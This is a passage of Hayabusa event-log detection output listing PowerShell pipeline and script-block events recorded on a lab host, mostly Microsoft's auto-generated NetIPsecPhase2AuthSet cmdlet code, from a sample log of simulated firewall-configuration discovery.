[object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { 
[object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('CloneObject', $__cmdletization_methodParameters, 
$__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecPhase2AuthSet'",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.973 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Get-Command): ""Get-Command"" ParameterBinding(Get-Command): name=""Module""; value=""Microsoft.PowerShell.Core"" ParameterBinding(Get-Command): name=""Name""; value=""Set-StrictMode""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.973 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Set-StrictMode): ""Set-StrictMode"" ParameterBinding(Set-StrictMode): name=""Off""; 
value=""True""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.973 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(New-Object): ""New-Object"" ParameterBinding(New-Object): name=""TypeName""; value=""System.Collections.Generic.Dictionary[string,string]""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.973 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.973 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""New-NetIPsecPhase2AuthSet""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.973 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; 
value=""Get-NetIPsecPhase2AuthSet""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.973 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Set-NetIPsecPhase2AuthSet""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.973 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Remove-NetIPsecPhase2AuthSet""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.973 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Rename-NetIPsecPhase2AuthSet""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.973 +00:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" 
ParameterBinding(Export-ModuleMember): name=""Function""; value=""Copy-NetIPsecPhase2AuthSet""",rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.973 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function __cmdletization_BindCommonParameters { param( $__cmdletization_objectModelWrapper, $myPSBoundParameters ) if ($myPSBoundParameters.ContainsKey('CimSession')) { $__cmdletization_objectModelWrapper.PSObject.Properties['CimSession'].Value = $myPSBoundParameters['CimSession'] } if ($myPSBoundParameters.ContainsKey('ThrottleLimit')) { $__cmdletization_objectModelWrapper.PSObject.Properties['ThrottleLimit'].Value = $myPSBoundParameters['ThrottleLimit'] } if ($myPSBoundParameters.ContainsKey('AsJob')) { $__cmdletization_objectModelWrapper.PSObject.Properties['AsJob'].Value = $myPSBoundParameters['AsJob'] } }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.973 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function New-NetIPsecPhase2AuthSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] param( [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${PolicyStore}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${GPOSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('ID')] [string] ${Name}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [string] ${DisplayName}, [Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Description}, 
[Parameter(ParameterSetName='cim:CreateInstance0')] [string] ${Group}, [Parameter(ParameterSetName='cim:CreateInstance0', Mandatory=$true)] [ciminstance[]] ${Proposal}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${Default}, [Parameter(ParameterSetName='cim:CreateInstance0')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='cim:CreateInstance0')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='cim:CreateInstance0')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object 'System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]' [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('PolicyStore')) { [object]$__cmdletization_value = ${PolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property 
@{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:PolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('GPOSession')) { [object]$__cmdletization_value = ${GPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:GPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Name')) { [object]$__cmdletization_value = ${Name} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object 
Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'InstanceID'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('DisplayName')) { [object]$__cmdletization_value = ${DisplayName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'ElementName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Description')) { [object]$__cmdletization_value = ${Description} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Description'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } 
$__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Group')) { [object]$__cmdletization_value = ${Group} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'RuleGroup'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Proposal')) { [object]$__cmdletization_value = ${Proposal} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'Proposals'; ParameterType = 'Microsoft.Management.Infrastructure.CimInstance[]'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('Default')) { 
[object]$__cmdletization_value = ${Default} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'cim:OperationOption:Default'; ParameterType = 'System.Management.Automation.SwitchParameter'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('cim:CreateInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_methodInvocationInfo) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.973 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Get-NetIPsecPhase2AuthSet { [CmdletBinding(DefaultParameterSetName='GetAll', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] 
[OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetIPsecRule', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecRule}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] 
[Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetIPsecRule')] [Parameter(ParameterSetName='GetAll')] [switch] ${AsJob}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = 
$__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values 
= @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecRule') -and (@('ByAssociatedNetIPsecRule') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecRule}, 'MSFT_NetConSecRuleEMAuthSet', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetIPsecRule', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder) } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP 
NetIPsecPhase2AuthSet.cmdletDefinition.cdxml-Help.xml }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx +2021-10-25 07:23:05.973 +00:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Set-NetIPsecPhase2AuthSet { [CmdletBinding(SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByDisplayGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByGroup', Mandatory=$true)] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [string] ${GPOSession}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByDisplayGroup')] [Parameter(ParameterSetName='ByGroup')] [Parameter(ParameterSetName='InputObject 
